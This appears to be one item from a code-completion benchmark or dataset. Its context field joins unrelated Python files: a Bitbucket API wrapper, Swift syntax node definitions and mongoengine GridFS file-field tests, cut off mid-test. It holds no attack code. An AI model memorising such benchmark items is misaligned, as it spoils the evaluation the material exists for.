gt
stringclasses
1 value
context
stringlengths
2.49k
119k
#!/usr/bin/env python # -*- coding: utf-8 -*- """Bitbucket API wrapper. Written to be somewhat like py-github: https://github.com/dustin/py-github """ try: from urllib.request import Request, urlopen except ImportError: from urllib2 import Request, urlopen try: from urllib.parse import urlencode except ImportError: from urllib import urlencode from functools import wraps import datetime import time import base64 try: import json except ImportError: import simplejson as json __all__ = ['AuthenticationRequired', 'to_datetime', 'BitBucket'] api_toplevel = 'https://api.bitbucket.org/' api_base = '%s1.0/' % api_toplevel class AuthenticationRequired(Exception): pass def requires_authentication(method): @wraps(method) def wrapper(self, *args, **kwargs): username = self.bb.username if hasattr(self, 'bb') else self.username password = self.bb.password if hasattr(self, 'bb') else self.password if not all((username, password)): raise AuthenticationRequired("%s requires authentication" % method.__name__) return method(self, *args, **kwargs) return wrapper def smart_encode(**kwargs): """Urlencode's provided keyword arguments. If any kwargs are None, it does not include those.""" args = dict(kwargs) for k, v in args.items(): if v is None: del args[k] if not args: return '' return urlencode(args) def to_datetime(timestring): """Convert one of the bitbucket API's timestamps to a datetime object.""" format = '%Y-%m-%d %H:%M:%S' timestring = timestring.split('+')[0].strip() return datetime.datetime(*time.strptime(timestring, format)[:7]) class BitBucket(object): """Main bitbucket class. Use an instantiated version of this class to make calls against the REST API.""" def __init__(self, username='', password='', verbose=False): self.username = username self.password = password self.verbose = verbose def build_request(self, url, method="GET", data=None): if not all((self.username, self.password)): return Request(url) auth = '%s:%s' % (self.username, self.password) auth = {'Authorization': 'Basic %s' % (base64.b64encode(auth.encode("utf_8")).decode("utf_8").strip())} request = Request(url, data, auth) request.get_method = lambda: method return request def load_url(self, url, method="GET", data=None): if self.verbose: print("Sending request to: [{}]".format(url)) request = self.build_request(url, method=method, data=data) result = urlopen(request).read().decode("utf_8") if self.verbose: print(u"Response data: [{}]".format(result)) return result def user(self, username): return User(self, username) def repository(self, username, slug): return Repository(self, username, slug) @requires_authentication def emails(self): """Returns a list of configured email addresses for the authenticated user.""" url = api_base + 'emails/' return json.loads(self.load_url(url)) @requires_authentication def create_repo(self, repo_data): url = api_base + 'repositories/' return json.loads(self.load_url(url, method="POST", data=urlencode(repo_data))) def __repr__(self): extra = '' if all((self.username, self.password)): extra = ' (auth: %s)' % self.username return '<BitBucket API%s>' % extra class User(object): """API encapsulation for user related bitbucket queries.""" def __init__(self, bb, username): self.bb = bb self.username = username def repository(self, slug): return Repository(self.bb, self.username, slug) def repositories(self): user_data = self.get() return user_data['repositories'] def events(self, start=None, limit=None): query = smart_encode(start=start, limit=limit) url = api_base + 'users/%s/events/' % self.username if query: url += '?%s' % query return json.loads(self.bb.load_url(url)) def get(self): url = api_base + 'users/%s/' % self.username return json.loads(self.bb.load_url(url)) def __repr__(self): return '<User: %s>' % self.username class Repository(object): def __init__(self, bb, username, slug): self.bb = bb self.username = username self.slug = slug self.base_url = api_base + 'repositories/%s/%s/' % (self.username, self.slug) def get(self): return json.loads(self.bb.load_url(self.base_url)) def changeset(self, revision): """Get one changeset from a repos.""" url = self.base_url + 'changesets/%s/' % (revision) return json.loads(self.bb.load_url(url)) def changesets(self, limit=None): """Get information about changesets on a repository.""" url = self.base_url + 'changesets/' query = smart_encode(limit=limit) if query: url += '?%s' % query return json.loads(self.bb.load_url(url)) def tags(self): """Get a list of tags for a repository.""" url = self.base_url + 'tags/' return json.loads(self.bb.load_url(url)) def branches(self): """Get a list of branches for a repository.""" url = self.base_url + 'branches/' return json.loads(self.bb.load_url(url)) def issue(self, number): return Issue(self.bb, self.username, self.slug, number) def issues(self, start=None, limit=None): url = self.base_url + 'issues/' query = smart_encode(start=start, limit=limit) if query: url += '?%s' % query return json.loads(self.bb.load_url(url)) def events(self): url = self.base_url + 'events/' return json.loads(self.bb.load_url(url)) def followers(self): url = self.base_url + 'followers/' return json.loads(self.bb.load_url(url)) @requires_authentication def save(self, repo_data): url = self.base_url return json.loads(self.bb.load_url(url, method="PUT", data=urlencode(repo_data))) def __repr__(self): return '<Repository: %s\'s %s>' % (self.username, self.slug) class Issue(object): def __init__(self, bb, username, slug, number): self.bb = bb self.username = username self.slug = slug self.number = number self.base_url = api_base + 'repositories/%s/%s/issues/%s/' % (username, slug, number) def get(self): return json.loads(self.bb.load_url(self.base_url)) def followers(self): url = self.base_url + 'followers/' return json.loads(self.bb.load_url(url)) def __repr__(self): return '<Issue #%s on %s\'s %s>' % (self.number, self.username, self.slug)
# flake8: noqa I201 from Child import Child from Node import Node DECL_NODES = [ # type-assignment -> '=' type Node('TypeInitializerClause', kind='Syntax', children=[ Child('Equal', kind='EqualToken'), Child('Value', kind='Type'), ]), # typealias-declaration -> attributes? access-level-modifier? 'typealias' # typealias-name generic-parameter-clause? # type-assignment # typealias-name -> identifier Node('TypealiasDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('TypealiasKeyword', kind='TypealiasToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Initializer', kind='TypeInitializerClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), ]), # associatedtype-declaration -> attributes? access-level-modifier? # 'associatedtype' associatedtype-name # inheritance-clause? type-assignment? # generic-where-clause? # associatedtype-name -> identifier Node('AssociatedtypeDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('AssociatedtypeKeyword', kind='AssociatedtypeToken'), Child('Identifier', kind='IdentifierToken'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('Initializer', kind='TypeInitializerClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), ]), Node('FunctionParameterList', kind='SyntaxCollection', element='FunctionParameter'), Node('ParameterClause', kind='Syntax', traits=['Parenthesized'], children=[ Child('LeftParen', kind='LeftParenToken'), Child('ParameterList', kind='FunctionParameterList'), Child('RightParen', kind='RightParenToken'), ]), # -> Type Node('ReturnClause', kind='Syntax', children=[ Child('Arrow', kind='ArrowToken'), Child('ReturnType', kind='Type'), ]), # function-signature -> # '(' parameter-list? ')' (throws | rethrows)? '->'? type? Node('FunctionSignature', kind='Syntax', children=[ Child('Input', kind='ParameterClause'), Child('ThrowsOrRethrowsKeyword', kind='Token', is_optional=True, token_choices=[ 'ThrowsToken', 'RethrowsToken', ]), Child('Output', kind='ReturnClause', is_optional=True), ]), # if-config-clause -> # ('#if' | '#elseif' | '#else') expr? (stmt-list | switch-case-list) Node('IfConfigClause', kind='Syntax', children=[ Child('PoundKeyword', kind='Token', classification='BuildConfigId', token_choices=[ 'PoundIfToken', 'PoundElseifToken', 'PoundElseToken', ]), Child('Condition', kind='Expr', classification='BuildConfigId', is_optional=True), Child('Elements', kind='Syntax', node_choices=[ Child('Statements', kind='CodeBlockItemList'), Child('SwitchCases', kind='SwitchCaseList'), Child('Decls', kind='MemberDeclList'), ]), ]), Node('IfConfigClauseList', kind='SyntaxCollection', element='IfConfigClause'), # if-config-decl -> '#if' expr stmt-list else-if-directive-clause-list # else-clause? '#endif' Node('IfConfigDecl', kind='Decl', children=[ Child('Clauses', kind='IfConfigClauseList'), Child('PoundEndif', kind='PoundEndifToken', classification='BuildConfigId'), ]), Node('PoundErrorDecl', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundError', kind='PoundErrorToken'), Child('LeftParen', kind='LeftParenToken'), Child('Message', kind='StringLiteralExpr'), Child('RightParen', kind='RightParenToken') ]), Node('PoundWarningDecl', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundWarning', kind='PoundWarningToken'), Child('LeftParen', kind='LeftParenToken'), Child('Message', kind='StringLiteralExpr'), Child('RightParen', kind='RightParenToken') ]), Node('PoundSourceLocation', kind='Decl', traits=['Parenthesized'], children=[ Child('PoundSourceLocation', kind='PoundSourceLocationToken'), Child('LeftParen', kind='LeftParenToken'), Child('Args', kind='PoundSourceLocationArgs', is_optional=True), Child('RightParen', kind='RightParenToken') ]), Node('PoundSourceLocationArgs', kind='Syntax', children=[ Child('FileArgLabel', kind='IdentifierToken', text_choices=['file']), Child('FileArgColon', kind='ColonToken'), Child('FileName', kind='StringLiteralToken'), Child('Comma', kind='CommaToken'), Child('LineArgLabel', kind='IdentifierToken', text_choices=['line']), Child('LineArgColon', kind='ColonToken'), Child('LineNumber', kind='IntegerLiteralToken'), ]), Node('DeclModifier', kind='Syntax', children=[ Child('Name', kind='Token', classification='Attribute', text_choices=[ 'class', 'convenience', 'dynamic', 'final', 'infix', 'lazy', 'optional', 'override', 'postfix', 'prefix', 'required', 'static', 'unowned', 'weak', 'private', 'fileprivate', 'internal', 'public', 'open', 'mutating', 'nonmutating', 'indirect', '__consuming' ]), Child('DetailLeftParen', kind='LeftParenToken', is_optional=True), Child('Detail', kind='IdentifierToken', is_optional=True), Child('DetailRightParen', kind='RightParenToken', is_optional=True), ]), Node('InheritedType', kind='Syntax', traits=['WithTrailingComma'], children=[ Child('TypeName', kind='Type'), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), Node('InheritedTypeList', kind='SyntaxCollection', element='InheritedType'), # type-inheritance-clause -> ':' type Node('TypeInheritanceClause', kind='Syntax', children=[ Child('Colon', kind='ColonToken'), Child('InheritedTypeCollection', kind='InheritedTypeList'), ]), # class-declaration -> attributes? access-level-modifier? # 'class' class-name # generic-parameter-clause? # type-inheritance-clause? # generic-where-clause? # '{' class-members '}' # class-name -> identifier Node('ClassDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ClassKeyword', kind='ClassToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), # struct-declaration -> attributes? access-level-modifier? # 'struct' struct-name # generic-parameter-clause? # type-inheritance-clause? # generic-where-clause? # '{' struct-members '}' # struct-name -> identifier Node('StructDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('StructKeyword', kind='StructToken'), Child('Identifier', kind='IdentifierToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), Node('ProtocolDecl', kind='Decl', traits=['DeclGroup', 'IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ProtocolKeyword', kind='ProtocolToken'), Child('Identifier', kind='IdentifierToken'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), # extension-declaration -> attributes? access-level-modifier? # 'extension' extended-type # type-inheritance-clause? # generic-where-clause? # '{' extension-members '}' # extension-name -> identifier Node('ExtensionDecl', kind='Decl', traits=['DeclGroup'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ExtensionKeyword', kind='ExtensionToken'), Child('ExtendedType', kind='Type'), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), Child('Members', kind='MemberDeclBlock'), ]), Node('MemberDeclBlock', kind='Syntax', traits=['Braced'], children=[ Child('LeftBrace', kind='LeftBraceToken'), Child('Members', kind='MemberDeclList'), Child('RightBrace', kind='RightBraceToken'), ]), # member-decl-list = member-decl member-decl-list? Node('MemberDeclList', kind='SyntaxCollection', element='MemberDeclListItem'), # member-decl = decl ';'? Node('MemberDeclListItem', kind='Syntax', description=''' A member declaration of a type consisting of a declaration and an \ optional semicolon; ''', children=[ Child('Decl', kind='Decl', description='The declaration of the type member.'), Child('Semicolon', kind='SemicolonToken', is_optional=True, description='An optional trailing semicolon.'), ]), # source-file = code-block-item-list eof Node('SourceFile', kind='Syntax', traits=['WithStatements'], children=[ Child('Statements', kind='CodeBlockItemList'), Child('EOFToken', kind='EOFToken') ]), # initializer -> '=' expr Node('InitializerClause', kind='Syntax', children=[ Child('Equal', kind='EqualToken'), Child('Value', kind='Expr'), ]), # parameter -> # external-parameter-name? local-parameter-name ':' # type '...'? '='? expression? ','? Node('FunctionParameter', kind='Syntax', traits=['WithTrailingComma'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('FirstName', kind='Token', token_choices=[ 'IdentifierToken', 'WildcardToken', ], is_optional=True), # One of these two names needs be optional, we choose the second # name to avoid backtracking. Child('SecondName', kind='Token', token_choices=[ 'IdentifierToken', 'WildcardToken', ], is_optional=True), Child('Colon', kind='ColonToken', is_optional=True), Child('Type', kind='Type', is_optional=True), Child('Ellipsis', kind='Token', is_optional=True), Child('DefaultArgument', kind='InitializerClause', is_optional=True), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), # declaration-modifier -> access-level-modifier # | mutation-modifier # | 'class' # | 'convenience' # | 'dynamic' # | 'final' # | 'infix' # | 'lazy' # | 'optional' # | 'override' # | 'postfix' # | 'prefix' # | 'required' # | 'static' # | 'unowned' # | 'unowned(safe)' # | 'unowned(unsafe)' # | 'weak' # mutation-modifier -> 'mutating' | 'nonmutating' Node('ModifierList', kind='SyntaxCollection', element='DeclModifier', element_name='Modifier'), Node('FunctionDecl', kind='Decl', traits=['IdentifiedDecl'], children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('FuncKeyword', kind='FuncToken'), Child('Identifier', kind='Token', token_choices=[ 'IdentifierToken', 'UnspacedBinaryOperatorToken', 'SpacedBinaryOperatorToken', 'PrefixOperatorToken', 'PostfixOperatorToken', ]), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Signature', kind='FunctionSignature'), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Body', kind='CodeBlock', is_optional=True), ]), Node('InitializerDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('InitKeyword', kind='InitToken'), Child('OptionalMark', kind='Token', token_choices=[ 'PostfixQuestionMarkToken', 'InfixQuestionMarkToken', 'ExclamationMarkToken', ], is_optional=True), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Parameters', kind='ParameterClause'), Child('ThrowsOrRethrowsKeyword', kind='Token', is_optional=True, token_choices=[ 'ThrowsToken', 'RethrowsToken', ]), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Body', kind='CodeBlock', is_optional=True), ]), Node('DeinitializerDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('DeinitKeyword', kind='DeinitToken'), Child('Body', kind='CodeBlock'), ]), Node('SubscriptDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('SubscriptKeyword', kind='SubscriptToken'), Child('GenericParameterClause', kind='GenericParameterClause', is_optional=True), Child('Indices', kind='ParameterClause'), Child('Result', kind='ReturnClause'), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True), # the body is not necessary inside a protocol definition Child('Accessor', kind='Syntax', is_optional=True, node_choices=[ Child('Accessors', kind='AccessorBlock'), Child('Getter', kind='CodeBlock')]), ]), # access-level-modifier -> 'private' | 'private' '(' 'set' ')' # | 'fileprivate' | 'fileprivate' '(' 'set' ')' # | 'internal' | 'internal' '(' 'set' ')' # | 'public' | 'public' '(' 'set' ')' # | 'open' | 'open' '(' 'set' ')' Node('AccessLevelModifier', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('LeftParen', kind='LeftParenToken', is_optional=True), Child('Modifier', kind='IdentifierToken', is_optional=True), Child('RightParen', kind='RightParenToken', is_optional=True), ]), Node('AccessPathComponent', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('TrailingDot', kind='PeriodToken', is_optional=True), ]), Node('AccessPath', kind='SyntaxCollection', element='AccessPathComponent'), Node('ImportDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('ImportTok', kind='ImportToken'), Child('ImportKind', kind='Token', is_optional=True, token_choices=[ 'TypealiasToken', 'StructToken', 'ClassToken', 'EnumToken', 'ProtocolToken', 'VarToken', 'LetToken', 'FuncToken', ]), Child('Path', kind='AccessPath'), ]), # (value) Node('AccessorParameter', kind='Syntax', traits=['Parenthesized'], children=[ Child('LeftParen', kind='LeftParenToken'), Child('Name', kind='IdentifierToken'), Child('RightParen', kind='RightParenToken'), ]), Node('AccessorDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifier', kind='DeclModifier', is_optional=True), Child('AccessorKind', kind='Token', text_choices=[ 'get', 'set', 'didSet', 'willSet', 'unsafeAddress', 'addressWithOwner', 'addressWithNativeOwner', 'unsafeMutableAddress', 'mutableAddressWithOwner', 'mutableAddressWithNativeOwner', '_read', '_modify' ]), Child('Parameter', kind='AccessorParameter', is_optional=True), Child('Body', kind='CodeBlock', is_optional=True), ]), Node('AccessorList', kind="SyntaxCollection", element='AccessorDecl'), Node('AccessorBlock', kind="Syntax", traits=['Braced'], children=[ Child('LeftBrace', kind='LeftBraceToken'), Child('Accessors', kind='AccessorList'), Child('RightBrace', kind='RightBraceToken'), ]), # Pattern: Type = Value { get {} }, Node('PatternBinding', kind="Syntax", traits=['WithTrailingComma'], children=[ Child('Pattern', kind='Pattern'), Child('TypeAnnotation', kind='TypeAnnotation', is_optional=True), Child('Initializer', kind='InitializerClause', is_optional=True), Child('Accessor', kind='Syntax', is_optional=True, node_choices=[ Child('Accessors', kind='AccessorBlock'), Child('Getter', kind='CodeBlock')]), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), Node('PatternBindingList', kind="SyntaxCollection", element='PatternBinding'), Node('VariableDecl', kind='Decl', children=[ Child('Attributes', kind='AttributeList', is_optional=True), Child('Modifiers', kind='ModifierList', is_optional=True), Child('LetOrVarKeyword', kind='Token', token_choices=[ 'LetToken', 'VarToken', ]), Child('Bindings', kind='PatternBindingList'), ]), Node('EnumCaseElement', kind='Syntax', description=''' An element of an enum case, containing the name of the case and, \ optionally, either associated values or an assignment to a raw value. ''', traits=['WithTrailingComma'], children=[ Child('Identifier', kind='IdentifierToken', description='The name of this case.'), Child('AssociatedValue', kind='ParameterClause', is_optional=True, description='The set of associated values of the case.'), Child('RawValue', kind='InitializerClause', is_optional=True, description=''' The raw value of this enum element, if present. '''), Child('TrailingComma', kind='CommaToken', is_optional=True, description=''' The trailing comma of this element, if the case has \ multiple elements. '''), ]), Node('EnumCaseElementList', kind='SyntaxCollection', description='A collection of 0 or more `EnumCaseElement`s.', element='EnumCaseElement'), Node('EnumCaseDecl', kind='Decl', description=''' A `case` declaration of a Swift `enum`. It can have 1 or more \ `EnumCaseElement`s inside, each declaring a different case of the enum. ''', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the case declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the case declaration. '''), Child('CaseKeyword', kind='CaseToken', description='The `case` keyword for this case.'), Child('Elements', kind='EnumCaseElementList', description='The elements this case declares.') ]), Node('EnumDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `enum` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the enum declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the enum declaration. '''), Child('EnumKeyword', kind='EnumToken', description=''' The `enum` keyword for this declaration. '''), Child('Identifier', kind='IdentifierToken', description=''' The name of this enum. '''), Child('GenericParameters', kind='GenericParameterClause', is_optional=True, description=''' The generic parameters, if any, for this enum. '''), Child('InheritanceClause', kind='TypeInheritanceClause', is_optional=True, description=''' The inheritance clause describing conformances or raw \ values for this enum. '''), Child('GenericWhereClause', kind='GenericWhereClause', is_optional=True, description=''' The `where` clause that applies to the generic parameters of \ this enum. '''), Child('Members', kind='MemberDeclBlock', description=''' The cases and other members of this enum. ''') ]), # operator-decl -> attribute? modifiers? 'operator' operator Node('OperatorDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `operator` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the 'operator' declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, classification='Attribute', description=''' The declaration modifiers applied to the 'operator' declaration. '''), Child('OperatorKeyword', kind='OperatorToken'), Child('Identifier', kind='Token', token_choices=[ 'UnspacedBinaryOperatorToken', 'SpacedBinaryOperatorToken', 'PrefixOperatorToken', 'PostfixOperatorToken', ]), Child('InfixOperatorGroup', kind='InfixOperatorGroup', description=''' Optionally specify a precedence group ''', is_optional=True), ]), # infix-operator-group -> ':' identifier Node('InfixOperatorGroup', kind='Syntax', description=''' A clause to specify precedence group in infix operator declaration. ''', children=[ Child('Colon', kind='ColonToken'), Child('PrecedenceGroupName', kind='IdentifierToken', description=''' The name of the precedence group for the operator '''), ]), # precedence-group-decl -> attributes? modifiers? 'precedencegroup' # identifier '{' precedence-group-attribute-list # '}' Node('PrecedenceGroupDecl', kind='Decl', traits=['IdentifiedDecl'], description='A Swift `precedencegroup` declaration.', children=[ Child('Attributes', kind='AttributeList', is_optional=True, description=''' The attributes applied to the 'precedencegroup' declaration. '''), Child('Modifiers', kind='ModifierList', is_optional=True, description=''' The declaration modifiers applied to the 'precedencegroup' declaration. '''), Child('PrecedencegroupKeyword', kind='PrecedencegroupToken'), Child('Identifier', kind='IdentifierToken', description=''' The name of this precedence group. '''), Child('LeftBrace', kind='LeftBraceToken'), Child('GroupAttributes', kind='PrecedenceGroupAttributeList', description=''' The characteristics of this precedence group. '''), Child('RightBrace', kind='RightBraceToken'), ]), # precedence-group-attribute-list -> # (precedence-group-relation | precedence-group-assignment | # precedence-group-associativity )* Node('PrecedenceGroupAttributeList', kind='SyntaxCollection', element='Syntax', element_choices=[ 'PrecedenceGroupRelation', 'PrecedenceGroupAssignment', 'PrecedenceGroupAssociativity' ]), # precedence-group-relation -> # ('higherThan' | 'lowerThan') ':' precedence-group-name-list Node('PrecedenceGroupRelation', kind='Syntax', description=''' Specify the new precedence group's relation to existing precedence groups. ''', children=[ Child('HigherThanOrLowerThan', kind='IdentifierToken', classification='Keyword', text_choices=[ 'higherThan', 'lowerThan', ], description=''' The relation to specified other precedence groups. '''), Child('Colon', kind='ColonToken'), Child('OtherNames', kind='PrecedenceGroupNameList', description=''' The name of other precedence group to which this precedence group relates. '''), ]), # precedence-group-name-list -> # identifier (',' identifier)* Node('PrecedenceGroupNameList', kind='SyntaxCollection', element='PrecedenceGroupNameElement'), Node('PrecedenceGroupNameElement', kind='Syntax', children=[ Child('Name', kind='IdentifierToken'), Child('TrailingComma', kind='CommaToken', is_optional=True), ]), # precedence-group-assignment -> # 'assignment' ':' ('true' | 'false') Node('PrecedenceGroupAssignment', kind='Syntax', description=''' Specifies the precedence of an operator when used in an operation that includes optional chaining. ''', children=[ Child('AssignmentKeyword', kind='IdentifierToken', text_choices=['assignment']), Child('Colon', kind='ColonToken'), Child('Flag', kind='Token', token_choices=[ 'TrueToken', 'FalseToken', ], description=''' When true, an operator in the corresponding precedence group uses the same grouping rules during optional chaining as the assignment operators from the standard library. Otherwise, operators in the precedence group follows the same optional chaining rules as operators that don't perform assignment. '''), ]), # precedence-group-associativity -> # 'associativity' ':' ('left' | 'right' | 'none') Node('PrecedenceGroupAssociativity', kind='Syntax', description=''' Specifies how a sequence of operators with the same precedence level are grouped together in the absence of grouping parentheses. ''', children=[ Child('AssociativityKeyword', kind='IdentifierToken', classification='Keyword', text_choices=['associativity']), Child('Colon', kind='ColonToken'), Child('Value', kind='IdentifierToken', text_choices=['left', 'right', 'none'], description=''' Operators that are `left`-associative group left-to-right. Operators that are `right`-associative group right-to-left. Operators that are specified with an associativity of `none` don't associate at all '''), ]), ]
# -*- coding: utf-8 -*- import copy import os import unittest import tempfile import gridfs import six from nose.plugins.skip import SkipTest from mongoengine import * from mongoengine.connection import get_db from mongoengine.python_support import StringIO try: from PIL import Image HAS_PIL = True except ImportError: HAS_PIL = False TEST_IMAGE_PATH = os.path.join(os.path.dirname(__file__), 'mongoengine.png') TEST_IMAGE2_PATH = os.path.join(os.path.dirname(__file__), 'mongodb_leaf.png') class FileTest(unittest.TestCase): def setUp(self): connect(db='mongoenginetest') self.db = get_db() def tearDown(self): self.db.drop_collection('fs.files') self.db.drop_collection('fs.chunks') def test_file_field_optional(self): # Make sure FileField is optional and not required class DemoFile(Document): the_file = FileField() DemoFile.objects.create() def test_file_fields(self): """Ensure that file fields can be written to and their data retrieved """ class PutFile(Document): the_file = FileField() PutFile.drop_collection() text = six.b('Hello, World!') content_type = 'text/plain' putfile = PutFile() putfile.the_file.put(text, content_type=content_type, filename="hello") putfile.save() result = PutFile.objects.first() self.assertTrue(putfile == result) self.assertEqual("%s" % result.the_file, "<GridFSProxy: hello>") self.assertEqual(result.the_file.read(), text) self.assertEqual(result.the_file.content_type, content_type) result.the_file.delete() # Remove file from GridFS PutFile.objects.delete() # Ensure file-like objects are stored PutFile.drop_collection() putfile = PutFile() putstring = StringIO() putstring.write(text) putstring.seek(0) putfile.the_file.put(putstring, content_type=content_type) putfile.save() result = PutFile.objects.first() self.assertTrue(putfile == result) self.assertEqual(result.the_file.read(), text) self.assertEqual(result.the_file.content_type, content_type) result.the_file.delete() def test_file_fields_stream(self): """Ensure that file fields can be written to and their data retrieved """ class StreamFile(Document): the_file = FileField() StreamFile.drop_collection() text = six.b('Hello, World!') more_text = six.b('Foo Bar') content_type = 'text/plain' streamfile = StreamFile() streamfile.the_file.new_file(content_type=content_type) streamfile.the_file.write(text) streamfile.the_file.write(more_text) streamfile.the_file.close() streamfile.save() result = StreamFile.objects.first() self.assertTrue(streamfile == result) self.assertEqual(result.the_file.read(), text + more_text) self.assertEqual(result.the_file.content_type, content_type) result.the_file.seek(0) self.assertEqual(result.the_file.tell(), 0) self.assertEqual(result.the_file.read(len(text)), text) self.assertEqual(result.the_file.tell(), len(text)) self.assertEqual(result.the_file.read(len(more_text)), more_text) self.assertEqual(result.the_file.tell(), len(text + more_text)) result.the_file.delete() # Ensure deleted file returns None self.assertTrue(result.the_file.read() is None) def test_file_fields_stream_after_none(self): """Ensure that a file field can be written to after it has been saved as None """ class StreamFile(Document): the_file = FileField() StreamFile.drop_collection() text = six.b('Hello, World!') more_text = six.b('Foo Bar') content_type = 'text/plain' streamfile = StreamFile() streamfile.save() streamfile.the_file.new_file() streamfile.the_file.write(text) streamfile.the_file.write(more_text) streamfile.the_file.close() streamfile.save() result = StreamFile.objects.first() self.assertTrue(streamfile == result) self.assertEqual(result.the_file.read(), text + more_text) # self.assertEqual(result.the_file.content_type, content_type) result.the_file.seek(0) self.assertEqual(result.the_file.tell(), 0) self.assertEqual(result.the_file.read(len(text)), text) self.assertEqual(result.the_file.tell(), len(text)) self.assertEqual(result.the_file.read(len(more_text)), more_text) self.assertEqual(result.the_file.tell(), len(text + more_text)) result.the_file.delete() # Ensure deleted file returns None self.assertTrue(result.the_file.read() is None) def test_file_fields_set(self): class SetFile(Document): the_file = FileField() text = six.b('Hello, World!') more_text = six.b('Foo Bar') SetFile.drop_collection() setfile = SetFile() setfile.the_file = text setfile.save() result = SetFile.objects.first() self.assertTrue(setfile == result) self.assertEqual(result.the_file.read(), text) # Try replacing file with new one result.the_file.replace(more_text) result.save() result = SetFile.objects.first() self.assertTrue(setfile == result) self.assertEqual(result.the_file.read(), more_text) result.the_file.delete() def test_file_field_no_default(self): class GridDocument(Document): the_file = FileField() GridDocument.drop_collection() with tempfile.TemporaryFile() as f: f.write(six.b("Hello World!")) f.flush() # Test without default doc_a = GridDocument() doc_a.save() doc_b = GridDocument.objects.with_id(doc_a.id) doc_b.the_file.replace(f, filename='doc_b') doc_b.save() self.assertNotEqual(doc_b.the_file.grid_id, None) # Test it matches doc_c = GridDocument.objects.with_id(doc_b.id) self.assertEqual(doc_b.the_file.grid_id, doc_c.the_file.grid_id) # Test with default doc_d = GridDocument(the_file=six.b('')) doc_d.save() doc_e = GridDocument.objects.with_id(doc_d.id) self.assertEqual(doc_d.the_file.grid_id, doc_e.the_file.grid_id) doc_e.the_file.replace(f, filename='doc_e') doc_e.save() doc_f = GridDocument.objects.with_id(doc_e.id) self.assertEqual(doc_e.the_file.grid_id, doc_f.the_file.grid_id) db = GridDocument._get_db() grid_fs = gridfs.GridFS(db) self.assertEqual(['doc_b', 'doc_e'], grid_fs.list()) def test_file_uniqueness(self): """Ensure that each instance of a FileField is unique """ class TestFile(Document): name = StringField() the_file = FileField() # First instance test_file = TestFile() test_file.name = "Hello, World!" test_file.the_file.put(six.b('Hello, World!')) test_file.save() # Second instance test_file_dupe = TestFile() data = test_file_dupe.the_file.read() # Should be None self.assertTrue(test_file.name != test_file_dupe.name) self.assertTrue(test_file.the_file.read() != data) TestFile.drop_collection() def test_file_saving(self): """Ensure you can add meta data to file""" class Animal(Document): genus = StringField() family = StringField() photo = FileField() 